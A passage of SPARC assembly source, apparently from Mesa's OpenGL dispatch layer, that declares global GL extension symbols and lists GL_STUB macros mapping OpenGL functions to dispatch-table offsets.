.globl glRequestResidentProgramsNV ; .type glRequestResidentProgramsNV,#function
.globl glTrackMatrixNV ; .type glTrackMatrixNV,#function
.globl glVertexAttrib1dNV ; .type glVertexAttrib1dNV,#function
.globl glVertexAttrib1dvNV ; .type glVertexAttrib1dvNV,#function
.globl glVertexAttrib1fNV ; .type glVertexAttrib1fNV,#function
.globl glVertexAttrib1fvNV ; .type glVertexAttrib1fvNV,#function
.globl glVertexAttrib1sNV ; .type glVertexAttrib1sNV,#function
.globl glVertexAttrib1svNV ; .type glVertexAttrib1svNV,#function
.globl glVertexAttrib2dNV ; .type glVertexAttrib2dNV,#function
.globl glVertexAttrib2dvNV ; .type glVertexAttrib2dvNV,#function
.globl glVertexAttrib2fNV ; .type glVertexAttrib2fNV,#function
.globl glVertexAttrib2fvNV ; .type glVertexAttrib2fvNV,#function
.globl glVertexAttrib2sNV ; .type glVertexAttrib2sNV,#function
.globl glVertexAttrib2svNV ; .type glVertexAttrib2svNV,#function
.globl glVertexAttrib3dNV ; .type glVertexAttrib3dNV,#function
.globl glVertexAttrib3dvNV ; .type glVertexAttrib3dvNV,#function
.globl glVertexAttrib3fNV ; .type glVertexAttrib3fNV,#function
.globl glVertexAttrib3fvNV ; .type glVertexAttrib3fvNV,#function
.globl glVertexAttrib3sNV ; .type glVertexAttrib3sNV,#function
.globl glVertexAttrib3svNV ; .type glVertexAttrib3svNV,#function
.globl glVertexAttrib4dNV ; .type glVertexAttrib4dNV,#function
.globl glVertexAttrib4dvNV ; .type glVertexAttrib4dvNV,#function
.globl glVertexAttrib4fNV ; .type glVertexAttrib4fNV,#function
.globl glVertexAttrib4fvNV ; .type glVertexAttrib4fvNV,#function
.globl glVertexAttrib4sNV ; .type glVertexAttrib4sNV,#function
.globl glVertexAttrib4svNV ; .type glVertexAttrib4svNV,#function
.globl glVertexAttrib4ubNV ; .type glVertexAttrib4ubNV,#function
.globl glVertexAttrib4ubvNV ; .type glVertexAttrib4ubvNV,#function
.globl glVertexAttribPointerNV ; .type glVertexAttribPointerNV,#function
.globl glVertexAttribs1dvNV ; .type glVertexAttribs1dvNV,#function
.globl glVertexAttribs1fvNV ; .type glVertexAttribs1fvNV,#function
.globl glVertexAttribs1svNV ; .type glVertexAttribs1svNV,#function
.globl glVertexAttribs2dvNV ; .type glVertexAttribs2dvNV,#function
.globl glVertexAttribs2fvNV ; .type glVertexAttribs2fvNV,#function
.globl glVertexAttribs2svNV ; .type glVertexAttribs2svNV,#function
.globl glVertexAttribs3dvNV ; .type glVertexAttribs3dvNV,#function
.globl glVertexAttribs3fvNV ; .type glVertexAttribs3fvNV,#function
.globl glVertexAttribs3svNV ; .type glVertexAttribs3svNV,#function
.globl glVertexAttribs4dvNV ; .type glVertexAttribs4dvNV,#function
.globl glVertexAttribs4fvNV ; .type glVertexAttribs4fvNV,#function
.globl glVertexAttribs4svNV ; .type glVertexAttribs4svNV,#function
.globl glVertexAttribs4ubvNV ; .type glVertexAttribs4ubvNV,#function
.globl glAlphaFragmentOp1ATI ; .type glAlphaFragmentOp1ATI,#function
.globl glAlphaFragmentOp2ATI ; .type glAlphaFragmentOp2ATI,#function
.globl glAlphaFragmentOp3ATI ; .type glAlphaFragmentOp3ATI,#function
.globl glBeginFragmentShaderATI ; .type glBeginFragmentShaderATI,#function
.globl glBindFragmentShaderATI ; .type glBindFragmentShaderATI,#function
.globl glColorFragmentOp1ATI ; .type glColorFragmentOp1ATI,#function
.globl glColorFragmentOp2ATI ; .type glColorFragmentOp2ATI,#function
.globl glColorFragmentOp3ATI ; .type glColorFragmentOp3ATI,#function
.globl glDeleteFragmentShaderATI ; .type glDeleteFragmentShaderATI,#function
.globl glEndFragmentShaderATI ; .type glEndFragmentShaderATI,#function
.globl glGenFragmentShadersATI ; .type glGenFragmentShadersATI,#function
.globl glPassTexCoordATI ; .type glPassTexCoordATI,#function
.globl glSampleMapATI ; .type glSampleMapATI,#function
.globl glSetFragmentShaderConstantATI ; .type glSetFragmentShaderConstantATI,#function
.globl glPointParameteriNV ; .type glPointParameteriNV,#function
.globl glPointParameterivNV ; .type glPointParameterivNV,#function
.globl gl_dispatch_stub_733 ; .type gl_dispatch_stub_733,#function
.globl gl_dispatch_stub_734 ; .type gl_dispatch_stub_734,#function
.globl gl_dispatch_stub_735 ; .type gl_dispatch_stub_735,#function
.globl gl_dispatch_stub_736 ; .type gl_dispatch_stub_736,#function
.globl gl_dispatch_stub_737 ; .type gl_dispatch_stub_737,#function
.globl glGetProgramNamedParameterdvNV ; .type glGetProgramNamedParameterdvNV,#function
.globl glGetProgramNamedParameterfvNV ; .type glGetProgramNamedParameterfvNV,#function
.globl glProgramNamedParameter4dNV ; .type glProgramNamedParameter4dNV,#function
.globl glProgramNamedParameter4dvNV ; .type glProgramNamedParameter4dvNV,#function
.globl glProgramNamedParameter4fNV ; .type glProgramNamedParameter4fNV,#function
.globl glProgramNamedParameter4fvNV ; .type glProgramNamedParameter4fvNV,#function
.globl gl_dispatch_stub_744 ; .type gl_dispatch_stub_744,#function
.globl gl_dispatch_stub_745 ; .type gl_dispatch_stub_745,#function
.globl glBindFramebufferEXT ; .type glBindFramebufferEXT,#function
.globl glBindRenderbufferEXT ; .type glBindRenderbufferEXT,#function
.globl glCheckFramebufferStatusEXT ; .type glCheckFramebufferStatusEXT,#function
.globl glDeleteFramebuffersEXT ; .type glDeleteFramebuffersEXT,#function
.globl glDeleteRenderbuffersEXT ; .type glDeleteRenderbuffersEXT,#function
.globl glFramebufferRenderbufferEXT ; .type glFramebufferRenderbufferEXT,#function
.globl glFramebufferTexture1DEXT ; .type glFramebufferTexture1DEXT,#function
.globl glFramebufferTexture2DEXT ; .type glFramebufferTexture2DEXT,#function
.globl glFramebufferTexture3DEXT ; .type glFramebufferTexture3DEXT,#function
.globl glGenFramebuffersEXT ; .type glGenFramebuffersEXT,#function
.globl glGenRenderbuffersEXT ; .type glGenRenderbuffersEXT,#function
.globl glGenerateMipmapEXT ; .type glGenerateMipmapEXT,#function
.globl glGetFramebufferAttachmentParameterivEXT ; .type glGetFramebufferAttachmentParameterivEXT,#function
.globl glGetRenderbufferParameterivEXT ; .type glGetRenderbufferParameterivEXT,#function
.globl glIsFramebufferEXT ; .type glIsFramebufferEXT,#function
.globl glIsRenderbufferEXT ; .type glIsRenderbufferEXT,#function
.globl glRenderbufferStorageEXT ; .type glRenderbufferStorageEXT,#function
.globl gl_dispatch_stub_763 ; .type gl_dispatch_stub_763,#function
.globl glFramebufferTextureLayerEXT ; .type glFramebufferTextureLayerEXT,#function
.globl gl_dispatch_stub_765 ; .type gl_dispatch_stub_765,#function
.globl gl_dispatch_stub_766 ; .type gl_dispatch_stub_766,#function
.globl gl_dispatch_stub_767 ; .type gl_dispatch_stub_767,#function
.globl gl_dispatch_stub_768 ; .type gl_dispatch_stub_768,#function
.globl gl_dispatch_stub_769 ; .type gl_dispatch_stub_769,#function
.globl _mesa_sparc_glapi_begin ; .type _mesa_sparc_glapi_begin,#function
_mesa_sparc_glapi_begin:
GL_STUB(glNewList, _gloffset_NewList)
GL_STUB(glEndList, _gloffset_EndList)
GL_STUB(glCallList, _gloffset_CallList)
GL_STUB(glCallLists, _gloffset_CallLists)
GL_STUB(glDeleteLists, _gloffset_DeleteLists)
GL_STUB(glGenLists, _gloffset_GenLists)
GL_STUB(glListBase, _gloffset_ListBase)
GL_STUB(glBegin, _gloffset_Begin)
GL_STUB(glBitmap, _gloffset_Bitmap)
GL_STUB(glColor3b, _gloffset_Color3b)
GL_STUB(glColor3bv, _gloffset_Color3bv)
GL_STUB(glColor3d, _gloffset_Color3d)
GL_STUB(glColor3dv, _gloffset_Color3dv)
GL_STUB(glColor3f, _gloffset_Color3f)
GL_STUB(glColor3fv, _gloffset_Color3fv)
GL_STUB(glColor3i, _gloffset_Color3i)
GL_STUB(glColor3iv, _gloffset_Color3iv)
GL_STUB(glColor3s, _gloffset_Color3s)
GL_STUB(glColor3sv, _gloffset_Color3sv)
GL_STUB(glColor3ub, _gloffset_Color3ub)
GL_STUB(glColor3ubv, _gloffset_Color3ubv)
GL_STUB(glColor3ui, _gloffset_Color3ui)
GL_STUB(glColor3uiv, _gloffset_Color3uiv)
GL_STUB(glColor3us, _gloffset_Color3us)
GL_STUB(glColor3usv, _gloffset_Color3usv)
GL_STUB(glColor4b, _gloffset_Color4b)
GL_STUB(glColor4bv, _gloffset_Color4bv)
GL_STUB(glColor4d, _gloffset_Color4d)
GL_STUB(glColor4dv, _gloffset_Color4dv)
GL_STUB(glColor4f, _gloffset_Color4f)
GL_STUB(glColor4fv, _gloffset_Color4fv)
GL_STUB(glColor4i, _gloffset_Color4i)
GL_STUB(glColor4iv, _gloffset_Color4iv)
GL_STUB(glColor4s, _gloffset_Color4s)
GL_STUB(glColor4sv, _gloffset_Color4sv)
GL_STUB(glColor4ub, _gloffset_Color4ub)
GL_STUB(glColor4ubv, _gloffset_Color4ubv)
GL_STUB(glColor4ui, _gloffset_Color4ui)
GL_STUB(glColor4uiv, _gloffset_Color4uiv)
GL_STUB(glColor4us, _gloffset_Color4us)
GL_STUB(glColor4usv, _gloffset_Color4usv)
GL_STUB(glEdgeFlag, _gloffset_EdgeFlag)
GL_STUB(glEdgeFlagv, _gloffset_EdgeFlagv)
GL_STUB(glEnd, _gloffset_End)
GL_STUB(glIndexd, _gloffset_Indexd)
GL_STUB(glIndexdv, _gloffset_Indexdv)
GL_STUB(glIndexf, _gloffset_Indexf)
GL_STUB(glIndexfv, _gloffset_Indexfv)
GL_STUB(glIndexi, _gloffset_Indexi)
GL_STUB(glIndexiv, _gloffset_Indexiv)
GL_STUB(glIndexs, _gloffset_Indexs)
GL_STUB(glIndexsv, _gloffset_Indexsv)
GL_STUB(glNormal3b, _gloffset_Normal3b)
GL_STUB(glNormal3bv, _gloffset_Normal3bv)
GL_STUB(glNormal3d, _gloffset_Normal3d)
GL_STUB(glNormal3dv, _gloffset_Normal3dv)
GL_STUB(glNormal3f, _gloffset_Normal3f)
GL_STUB(glNormal3fv, _gloffset_Normal3fv)
GL_STUB(glNormal3i, _gloffset_Normal3i)
GL_STUB(glNormal3iv, _gloffset_Normal3iv)
GL_STUB(glNormal3s, _gloffset_Normal3s)
GL_STUB(glNormal3sv, _gloffset_Normal3sv)
GL_STUB(glRasterPos2d, _gloffset_RasterPos2d)
GL_STUB(glRasterPos2dv, _gloffset_RasterPos2dv)
GL_STUB(glRasterPos2f, _gloffset_RasterPos2f)
GL_STUB(glRasterPos2fv, _gloffset_RasterPos2fv)
GL_STUB(glRasterPos2i, _gloffset_RasterPos2i)
GL_STUB(glRasterPos2iv, _gloffset_RasterPos2iv)
GL_STUB(glRasterPos2s, _gloffset_RasterPos2s)
GL_STUB(glRasterPos2sv, _gloffset_RasterPos2sv)
GL_STUB(glRasterPos3d, _gloffset_RasterPos3d)
GL_STUB(glRasterPos3dv, _gloffset_RasterPos3dv)
GL_STUB(glRasterPos3f, _gloffset_RasterPos3f)
GL_STUB(glRasterPos3fv, _gloffset_RasterPos3fv)
GL_STUB(glRasterPos3i, _gloffset_RasterPos3i)
GL_STUB(glRasterPos3iv, _gloffset_RasterPos3iv)
GL_STUB(glRasterPos3s, _gloffset_RasterPos3s)
GL_STUB(glRasterPos3sv, _gloffset_RasterPos3sv)
GL_STUB(glRasterPos4d, _gloffset_RasterPos4d)
GL_STUB(glRasterPos4dv, _gloffset_RasterPos4dv)
GL_STUB(glRasterPos4f, _gloffset_RasterPos4f)
GL_STUB(glRasterPos4fv, _gloffset_RasterPos4fv)
GL_STUB(glRasterPos4i, _gloffset_RasterPos4i)
GL_STUB(glRasterPos4iv, _gloffset_RasterPos4iv)
GL_STUB(glRasterPos4s, _gloffset_RasterPos4s)
GL_STUB(glRasterPos4sv, _gloffset_RasterPos4sv)
GL_STUB(glRectd, _gloffset_Rectd)
GL_STUB(glRectdv, _gloffset_Rectdv)
GL_STUB(glRectf, _gloffset_Rectf)
GL_STUB(glRectfv, _gloffset_Rectfv)
GL_STUB(glRecti, _gloffset_Recti)
GL_STUB(glRectiv, _gloffset_Rectiv)
GL_STUB(glRects, _gloffset_Rects)
GL_STUB(glRectsv, _gloffset_Rectsv)
GL_STUB(glTexCoord1d, _gloffset_TexCoord1d)
GL_STUB(glTexCoord1dv, _gloffset_TexCoord1dv)
GL_STUB(glTexCoord1f, _gloffset_TexCoord1f)
GL_STUB(glTexCoord1fv, _gloffset_TexCoord1fv)
GL_STUB(glTexCoord1i, _gloffset_TexCoord1i)
GL_STUB(glTexCoord1iv, _gloffset_TexCoord1iv)
GL_STUB(glTexCoord1s, _gloffset_TexCoord1s)
GL_STUB(glTexCoord1sv, _gloffset_TexCoord1sv)
GL_STUB(glTexCoord2d, _gloffset_TexCoord2d)
GL_STUB(glTexCoord2dv, _gloffset_TexCoord2dv)
GL_STUB(glTexCoord2f, _gloffset_TexCoord2f)
GL_STUB(glTexCoord2fv, _gloffset_TexCoord2fv)
GL_STUB(glTexCoord2i, _gloffset_TexCoord2i)
GL_STUB(glTexCoord2iv, _gloffset_TexCoord2iv)
GL_STUB(glTexCoord2s, _gloffset_TexCoord2s)
GL_STUB(glTexCoord2sv, _gloffset_TexCoord2sv)
GL_STUB(glTexCoord3d, _gloffset_TexCoord3d)
GL_STUB(glTexCoord3dv, _gloffset_TexCoord3dv)
GL_STUB(glTexCoord3f, _gloffset_TexCoord3f)
GL_STUB(glTexCoord3fv, _gloffset_TexCoord3fv)
GL_STUB(glTexCoord3i, _gloffset_TexCoord3i)
GL_STUB(glTexCoord3iv, _gloffset_TexCoord3iv)
GL_STUB(glTexCoord3s, _gloffset_TexCoord3s)
GL_STUB(glTexCoord3sv, _gloffset_TexCoord3sv)
GL_STUB(glTexCoord4d, _gloffset_TexCoord4d)
GL_STUB(glTexCoord4dv, _gloffset_TexCoord4dv)
GL_STUB(glTexCoord4f, _gloffset_TexCoord4f)
GL_STUB(glTexCoord4fv, _gloffset_TexCoord4fv)
GL_STUB(glTexCoord4i, _gloffset_TexCoord4i)
GL_STUB(glTexCoord4iv, _gloffset_TexCoord4iv)
GL_STUB(glTexCoord4s, _gloffset_TexCoord4s)
GL_STUB(glTexCoord4sv, _gloffset_TexCoord4sv)
GL_STUB(glVertex2d, _gloffset_Vertex2d)
GL_STUB(glVertex2dv, _gloffset_Vertex2dv)
GL_STUB(glVertex2f, _gloffset_Vertex2f)
GL_STUB(glVertex2fv, _gloffset_Vertex2fv)
GL_STUB(glVertex2i, _gloffset_Vertex2i)
GL_STUB(glVertex2iv, _gloffset_Vertex2iv)
GL_STUB(glVertex2s, _gloffset_Vertex2s)
GL_STUB(glVertex2sv, _gloffset_Vertex2sv)
GL_STUB(glVertex3d, _gloffset_Vertex3d)
GL_STUB(glVertex3dv, _gloffset_Vertex3dv)
GL_STUB(glVertex3f, _gloffset_Vertex3f)
GL_STUB(glVertex3fv, _gloffset_Vertex3fv)
GL_STUB(glVertex3i, _gloffset_Vertex3i)
GL_STUB(glVertex3iv, _gloffset_Vertex3iv)
GL_STUB(glVertex3s, _gloffset_Vertex3s)
GL_STUB(glVertex3sv, _gloffset_Vertex3sv)
GL_STUB(glVertex4d, _gloffset_Vertex4d)
GL_STUB(glVertex4dv, _gloffset_Vertex4dv)
GL_STUB(glVertex4f, _gloffset_Vertex4f)
GL_STUB(glVertex4fv, _gloffset_Vertex4fv)
GL_STUB(glVertex4i, _gloffset_Vertex4i)
GL_STUB(glVertex4iv, _gloffset_Vertex4iv)
GL_STUB(glVertex4s, _gloffset_Vertex4s)
GL_STUB(glVertex4sv, _gloffset_Vertex4sv)
GL_STUB(glClipPlane, _gloffset_ClipPlane)
GL_STUB(glColorMaterial, _gloffset_ColorMaterial)
GL_STUB(glCullFace, _gloffset_CullFace)
GL_STUB(glFogf, _gloffset_Fogf)
GL_STUB(glFogfv, _gloffset_Fogfv)
GL_STUB(glFogi, _gloffset_Fogi)
GL_STUB(glFogiv, _gloffset_Fogiv)
GL_STUB(glFrontFace, _gloffset_FrontFace)
GL_STUB(glHint, _gloffset_Hint)
GL_STUB(glLightf, _gloffset_Lightf)
GL_STUB(glLightfv, _gloffset_Lightfv)
GL_STUB(glLighti, _gloffset_Lighti)
GL_STUB(glLightiv, _gloffset_Lightiv)
GL_STUB(glLightModelf, _gloffset_LightModelf)
GL_STUB(glLightModelfv, _gloffset_LightModelfv)
GL_STUB(glLightModeli, _gloffset_LightModeli)
GL_STUB(glLightModeliv, _gloffset_LightModeliv)
GL_STUB(glLineStipple, _gloffset_LineStipple)
GL_STUB(glLineWidth, _gloffset_LineWidth)
GL_STUB(glMaterialf, _gloffset_Materialf)
GL_STUB(glMaterialfv, _gloffset_Materialfv)
GL_STUB(glMateriali, _gloffset_Materiali)
GL_STUB(glMaterialiv, _gloffset_Materialiv)
GL_STUB(glPointSize, _gloffset_PointSize)
GL_STUB(glPolygonMode, _gloffset_PolygonMode)
GL_STUB(glPolygonStipple, _gloffset_PolygonStipple)
GL_STUB(glScissor, _gloffset_Scissor)
GL_STUB(glShadeModel, _gloffset_ShadeModel)
GL_STUB(glTexParameterf, _gloffset_TexParameterf)
GL_STUB(glTexParameterfv, _gloffset_TexParameterfv)
GL_STUB(glTexParameteri, _gloffset_TexParameteri)
GL_STUB(glTexParameteriv, _gloffset_TexParameteriv)
GL_STUB(glTexImage1D, _gloffset_TexImage1D)
GL_STUB(glTexImage2D, _gloffset_TexImage2D)
GL_STUB(glTexEnvf, _gloffset_TexEnvf)
GL_STUB(glTexEnvfv, _gloffset_TexEnvfv)
GL_STUB(glTexEnvi, _gloffset_TexEnvi)
GL_STUB(glTexEnviv, _gloffset_TexEnviv)
GL_STUB(glTexGend, _gloffset_TexGend)
GL_STUB(glTexGendv, _gloffset_TexGendv)
GL_STUB(glTexGenf, _gloffset_TexGenf)
GL_STUB(glTexGenfv, _gloffset_TexGenfv)
GL_STUB(glTexGeni, _gloffset_TexGeni)
GL_STUB(glTexGeniv, _gloffset_TexGeniv)
GL_STUB(glFeedbackBuffer, _gloffset_FeedbackBuffer)
GL_STUB(glSelectBuffer, _gloffset_SelectBuffer)
GL_STUB(glRenderMode, _gloffset_RenderMode)
GL_STUB(glInitNames, _gloffset_InitNames)
GL_STUB(glLoadName, _gloffset_LoadName)
GL_STUB(glPassThrough, _gloffset_PassThrough)
GL_STUB(glPopName, _gloffset_PopName)
GL_STUB(glPushName, _gloffset_PushName)
GL_STUB(glDrawBuffer, _gloffset_DrawBuffer)
GL_STUB(glClear, _gloffset_Clear)
GL_STUB(glClearAccum, _gloffset_ClearAccum)
GL_STUB(glClearIndex, _gloffset_ClearIndex)
GL_STUB(glClearColor, _gloffset_ClearColor)
GL_STUB(glClearStencil, _gloffset_ClearStencil)
GL_STUB(glClearDepth, _gloffset_ClearDepth)
GL_STUB(glStencilMask, _gloffset_StencilMask)
GL_STUB(glColorMask, _gloffset_ColorMask)
GL_STUB(glDepthMask, _gloffset_DepthMask)
GL_STUB(glIndexMask, _gloffset_IndexMask)
GL_STUB(glAccum, _gloffset_Accum)
GL_STUB(glDisable, _gloffset_Disable)
GL_STUB(glEnable, _gloffset_Enable)
GL_STUB(glFinish, _gloffset_Finish)
GL_STUB(glFlush, _gloffset_Flush)
GL_STUB(glPopAttrib, _gloffset_PopAttrib)
GL_STUB(glPushAttrib, _gloffset_PushAttrib)
GL_STUB(glMap1d, _gloffset_Map1d)
GL_STUB(glMap1f, _gloffset_Map1f)
GL_STUB(glMap2d, _gloffset_Map2d)
GL_STUB(glMap2f, _gloffset_Map2f)
GL_STUB(glMapGrid1d, _gloffset_MapGrid1d)
GL_STUB(glMapGrid1f, _gloffset_MapGrid1f)
GL_STUB(glMapGrid2d, _gloffset_MapGrid2d)
GL_STUB(glMapGrid2f, _gloffset_MapGrid2f)
GL_STUB(glEvalCoord1d, _gloffset_EvalCoord1d)
GL_STUB(glEvalCoord1dv, _gloffset_EvalCoord1dv)
GL_STUB(glEvalCoord1f, _gloffset_EvalCoord1f)
GL_STUB(glEvalCoord1fv, _gloffset_EvalCoord1fv)
GL_STUB(glEvalCoord2d, _gloffset_EvalCoord2d)
GL_STUB(glEvalCoord2dv, _gloffset_EvalCoord2dv)
GL_STUB(glEvalCoord2f, _gloffset_EvalCoord2f)
GL_STUB(glEvalCoord2fv, _gloffset_EvalCoord2fv)
GL_STUB(glEvalMesh1, _gloffset_EvalMesh1)
GL_STUB(glEvalPoint1, _gloffset_EvalPoint1)
GL_STUB(glEvalMesh2, _gloffset_EvalMesh2)
GL_STUB(glEvalPoint2, _gloffset_EvalPoint2)
GL_STUB(glAlphaFunc, _gloffset_AlphaFunc)
GL_STUB(glBlendFunc, _gloffset_BlendFunc)
GL_STUB(glLogicOp, _gloffset_LogicOp)
GL_STUB(glStencilFunc, _gloffset_StencilFunc)
GL_STUB(glStencilOp, _gloffset_StencilOp)
GL_STUB(glDepthFunc, _gloffset_DepthFunc)
GL_STUB(glPixelZoom, _gloffset_PixelZoom)
GL_STUB(glPixelTransferf, _gloffset_PixelTransferf)
GL_STUB(glPixelTransferi, _gloffset_PixelTransferi)
GL_STUB(glPixelStoref, _gloffset_PixelStoref)
GL_STUB(glPixelStorei, _gloffset_PixelStorei)
GL_STUB(glPixelMapfv, _gloffset_PixelMapfv)
GL_STUB(glPixelMapuiv, _gloffset_PixelMapuiv)
GL_STUB(glPixelMapusv, _gloffset_PixelMapusv)
GL_STUB(glReadBuffer, _gloffset_ReadBuffer)
GL_STUB(glCopyPixels, _gloffset_CopyPixels)
GL_STUB(glReadPixels, _gloffset_ReadPixels)
GL_STUB(glDrawPixels, _gloffset_DrawPixels)
GL_STUB(glGetBooleanv, _gloffset_GetBooleanv)
GL_STUB(glGetClipPlane, _gloffset_GetClipPlane)
GL_STUB(glGetDoublev, _gloffset_GetDoublev)
GL_STUB(glGetError, _gloffset_GetError)
GL_STUB(glGetFloatv, _gloffset_GetFloatv)
GL_STUB(glGetIntegerv, _gloffset_GetIntegerv)
GL_STUB(glGetLightfv, _gloffset_GetLightfv)
GL_STUB(glGetLightiv, _gloffset_GetLightiv)
GL_STUB(glGetMapdv, _gloffset_GetMapdv)
GL_STUB(glGetMapfv, _gloffset_GetMapfv)
GL_STUB(glGetMapiv, _gloffset_GetMapiv)
GL_STUB(glGetMaterialfv, _gloffset_GetMaterialfv)
GL_STUB(glGetMaterialiv, _gloffset_GetMaterialiv)
GL_STUB(glGetPixelMapfv, _gloffset_GetPixelMapfv)
GL_STUB(glGetPixelMapuiv, _gloffset_GetPixelMapuiv)
GL_STUB(glGetPixelMapusv, _gloffset_GetPixelMapusv)
GL_STUB(glGetPolygonStipple, _gloffset_GetPolygonStipple)
GL_STUB(glGetString, _gloffset_GetString)
GL_STUB(glGetTexEnvfv, _gloffset_GetTexEnvfv)
GL_STUB(glGetTexEnviv, _gloffset_GetTexEnviv)
GL_STUB(glGetTexGendv, _gloffset_GetTexGendv)
GL_STUB(glGetTexGenfv, _gloffset_GetTexGenfv)
GL_STUB(glGetTexGeniv, _gloffset_GetTexGeniv)
GL_STUB(glGetTexImage, _gloffset_GetTexImage)
GL_STUB(glGetTexParameterfv, _gloffset_GetTexParameterfv)
GL_STUB(glGetTexParameteriv, _gloffset_GetTexParameteriv)
GL_STUB(glGetTexLevelParameterfv, _gloffset_GetTexLevelParameterfv)
GL_STUB(glGetTexLevelParameteriv, _gloffset_GetTexLevelParameteriv)
GL_STUB(glIsEnabled, _gloffset_IsEnabled)
GL_STUB(glIsList, _gloffset_IsList)
GL_STUB(glDepthRange, _gloffset_DepthRange)
GL_STUB(glFrustum, _gloffset_Frustum)
GL_STUB(glLoadIdentity, _gloffset_LoadIdentity)
GL_STUB(glLoadMatrixf, _gloffset_LoadMatrixf)
GL_STUB(glLoadMatrixd, _gloffset_LoadMatrixd)
GL_STUB(glMatrixMode, _gloffset_MatrixMode)
GL_STUB(glMultMatrixf, _gloffset_MultMatrixf)
GL_STUB(glMultMatrixd, _gloffset_MultMatrixd)
GL_STUB(glOrtho, _gloffset_Ortho)
GL_STUB(glPopMatrix, _gloffset_PopMatrix)
GL_STUB(glPushMatrix, _gloffset_PushMatrix)
GL_STUB(glRotated, _gloffset_Rotated)
GL_STUB(glRotatef, _gloffset_Rotatef)
GL_STUB(glScaled, _gloffset_Scaled)
GL_STUB(glScalef, _gloffset_Scalef)
GL_STUB(glTranslated, _gloffset_Translated)
GL_STUB(glTranslatef, _gloffset_Translatef)
GL_STUB(glViewport, _gloffset_Viewport)
GL_STUB(glArrayElement, _gloffset_ArrayElement)
GL_STUB(glBindTexture, _gloffset_BindTexture)
GL_STUB(glColorPointer, _gloffset_ColorPointer)
GL_STUB(glDisableClientState, _gloffset_DisableClientState)
GL_STUB(glDrawArrays, _gloffset_DrawArrays)
GL_STUB(glDrawElements, _gloffset_DrawElements)
GL_STUB(glEdgeFlagPointer, _gloffset_EdgeFlagPointer)
GL_STUB(glEnableClientState, _gloffset_EnableClientState)
GL_STUB(glIndexPointer, _gloffset_IndexPointer)
GL_STUB(glIndexub, _gloffset_Indexub)
GL_STUB(glIndexubv, _gloffset_Indexubv)
GL_STUB(glInterleavedArrays, _gloffset_InterleavedArrays)
GL_STUB(glNormalPointer, _gloffset_NormalPointer)
GL_STUB(glPolygonOffset, _gloffset_PolygonOffset)
GL_STUB(glTexCoordPointer, _gloffset_TexCoordPointer)
GL_STUB(glVertexPointer, _gloffset_VertexPointer)
GL_STUB(glAreTexturesResident, _gloffset_AreTexturesResident)
GL_STUB(glCopyTexImage1D, _gloffset_CopyTexImage1D)
GL_STUB(glCopyTexImage2D, _gloffset_CopyTexImage2D)
GL_STUB(glCopyTexSubImage1D, _gloffset_CopyTexSubImage1D)
GL_STUB(glCopyTexSubImage2D, _gloffset_CopyTexSubImage2D)
GL_STUB(glDeleteTextures, _gloffset_DeleteTextures)
GL_STUB(glGenTextures, _gloffset_GenTextures)
GL_STUB(glGetPointerv, _gloffset_GetPointerv)
GL_STUB(glIsTexture, _gloffset_IsTexture)
GL_STUB(glPrioritizeTextures, _gloffset_PrioritizeTextures)
GL_STUB(glTexSubImage1D, _gloffset_TexSubImage1D)
GL_STUB(glTexSubImage2D, _gloffset_TexSubImage2D)
GL_STUB(glPopClientAttrib, _gloffset_PopClientAttrib)
GL_STUB(glPushClientAttrib, _gloffset_PushClientAttrib)
GL_STUB(glBlendColor, _gloffset_BlendColor)
GL_STUB(glBlendEquation, _gloffset_BlendEquation)
GL_STUB(glDrawRangeElements, _gloffset_DrawRangeElements)
GL_STUB(glColorTable, _gloffset_ColorTable)
GL_STUB(glColorTableParameterfv, _gloffset_ColorTableParameterfv)
GL_STUB(glColorTableParameteriv, _gloffset_ColorTableParameteriv)
GL_STUB(glCopyColorTable, _gloffset_CopyColorTable)
GL_STUB(glGetColorTable, _gloffset_GetColorTable)
GL_STUB(glGetColorTableParameterfv, _gloffset_GetColorTableParameterfv)
GL_STUB(glGetColorTableParameteriv, _gloffset_GetColorTableParameteriv)
GL_STUB(glColorSubTable, _gloffset_ColorSubTable)
GL_STUB(glCopyColorSubTable, _gloffset_CopyColorSubTable)
GL_STUB(glConvolutionFilter1D, _gloffset_ConvolutionFilter1D)
GL_STUB(glConvolutionFilter2D, _gloffset_ConvolutionFilter2D)
GL_STUB(glConvolutionParameterf, _gloffset_ConvolutionParameterf)
GL_STUB(glConvolutionParameterfv, _gloffset_ConvolutionParameterfv)
GL_STUB(glConvolutionParameteri, _gloffset_ConvolutionParameteri)
GL_STUB(glConvolutionParameteriv, _gloffset_ConvolutionParameteriv)
GL_STUB(glCopyConvolutionFilter1D, _gloffset_CopyConvolutionFilter1D)
GL_STUB(glCopyConvolutionFilter2D, _gloffset_CopyConvolutionFilter2D)
GL_STUB(glGetConvolutionFilter, _gloffset_GetConvolutionFilter)
GL_STUB(glGetConvolutionParameterfv, _gloffset_GetConvolutionParameterfv)
GL_STUB(glGetConvolutionParameteriv, _gloffset_GetConvolutionParameteriv)
GL_STUB(glGetSeparableFilter, _gloffset_GetSeparableFilter)
GL_STUB(glSeparableFilter2D, _gloffset_SeparableFilter2D)
GL_STUB(glGetHistogram, _gloffset_GetHistogram)
GL_STUB(glGetHistogramParameterfv, _gloffset_GetHistogramParameterfv)
GL_STUB(glGetHistogramParameteriv, _gloffset_GetHistogramParameteriv)
GL_STUB(glGetMinmax, _gloffset_GetMinmax)
GL_STUB(glGetMinmaxParameterfv, _gloffset_GetMinmaxParameterfv)
GL_STUB(glGetMinmaxParameteriv, _gloffset_GetMinmaxParameteriv)
GL_STUB(glHistogram, _gloffset_Histogram)
GL_STUB(glMinmax, _gloffset_Minmax)
GL_STUB(glResetHistogram, _gloffset_ResetHistogram)
GL_STUB(glResetMinmax, _gloffset_ResetMinmax)
GL_STUB(glTexImage3D, _gloffset_TexImage3D)
GL_STUB(glTexSubImage3D, _gloffset_TexSubImage3D)
GL_STUB(glCopyTexSubImage3D, _gloffset_CopyTexSubImage3D)
GL_STUB(glActiveTextureARB, _gloffset_ActiveTextureARB)
GL_STUB(glClientActiveTextureARB, _gloffset_ClientActiveTextureARB)
GL_STUB(glMultiTexCoord1dARB, _gloffset_MultiTexCoord1dARB)
GL_STUB(glMultiTexCoord1dvARB, _gloffset_MultiTexCoord1dvARB)
GL_STUB(glMultiTexCoord1fARB, _gloffset_MultiTexCoord1fARB)
GL_STUB(glMultiTexCoord1fvARB, _gloffset_MultiTexCoord1fvARB)
GL_STUB(glMultiTexCoord1iARB, _gloffset_MultiTexCoord1iARB)
GL_STUB(glMultiTexCoord1ivARB, _gloffset_MultiTexCoord1ivARB)
GL_STUB(glMultiTexCoord1sARB, _gloffset_MultiTexCoord1sARB)
